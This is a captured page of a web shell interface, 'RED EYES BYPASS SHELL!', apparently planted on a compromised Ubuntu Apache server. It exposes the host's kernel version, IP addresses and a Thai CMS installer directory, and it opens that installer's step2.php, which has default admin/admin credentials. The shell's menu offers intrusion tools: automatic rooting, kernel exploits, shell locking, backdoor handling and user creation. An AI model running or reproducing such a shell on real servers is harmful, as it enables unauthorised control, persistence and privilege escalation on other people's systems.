Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
commert /
accout /
install /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
img
[ DIR ]
drwxr-xr-x
settings
[ DIR ]
drwxr-xr-x
complete.php
542
B
-rwxr-xr-x
database.sql
13.51
KB
-rwxr-xr-x
db.php
13.63
KB
-rwxr-xr-x
index.php
2.28
KB
-rwxr-xr-x
language.php
3.5
KB
-rwxr-xr-x
step0.php
3.83
KB
-rwxr-xr-x
step1.php
2.87
KB
-rwxr-xr-x
step2.php
2.16
KB
-rwxr-xr-x
step3.php
4.1
KB
-rwxr-xr-x
step4.php
9.48
KB
-rwxr-xr-x
style.css
1.03
KB
-rwxr-xr-x
upgrade0.php
2.85
KB
-rwxr-xr-x
upgrade1.php
1.78
KB
-rwxr-xr-x
upgrade2.php
25.66
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : step2.php
<?php if (defined('ROOT_PATH')) { $username = isset($_SESSION['username']) ? $_SESSION['username'] : 'admin@localhost'; $password = isset($_SESSION['password']) ? $_SESSION['password'] : 'admin'; echo '<form method=post action=index.php autocomplete=off>'; echo '<h2>สมาชิกผู้ดูแลระบบ</h2>'; echo '<p>คุณจะต้องระบุข้อมูลสมาชิกผู้ดูแลระบบ ซึ่งจะมีสิทธิสูงสุดในระบบ <em>ห้ามลืม ห้ามหาย</em></p>'; echo '<p class=item><label for=username>ชื่อผู้ใช้</label><span class="g-input icon-user"><input type=text size=50 maxlength=255 id=username name=username value="'.$username.'"></span></p>'; if (empty($username)) { echo '<p class=comment><em>กรุณากรอกชื่อผู้ใช้ที่ต้องการ ใช้ในการเข้าระบบเป็นผู้ดูแลสูงสุด</em></p>'; } else { echo '<p class=comment>กรุณากรอกชื่อผู้ใช้ที่ต้องการ ใช้ในการเข้าระบบเป็นผู้ดูแลสูงสุด</p>'; } echo '<p class=item><label for=password>รหัสผ่าน</label><span class="g-input icon-password"><input type=password size=50 maxlength=20 id=password name=password value="'.$password.'"></span></p>'; if (empty($password)) { echo '<p class=comment><em>กรุณากรอกรหัสผ่านที่ต้องการ ใช้ในการเข้าระบบเป็นผู้ดูแลสูงสุด</em></p>'; } else { echo '<p class=comment>กรุณากรอกรหัสผ่านที่ต้องการ ใช้ในการเข้าระบบเป็นผู้ดูแลสูงสุด</p>'; } echo '<input type=hidden name=step value=3>'; echo '<p><input class="button large save" type=submit value="ดำเนินการต่อ"></p>'; echo '</form>'; }
Close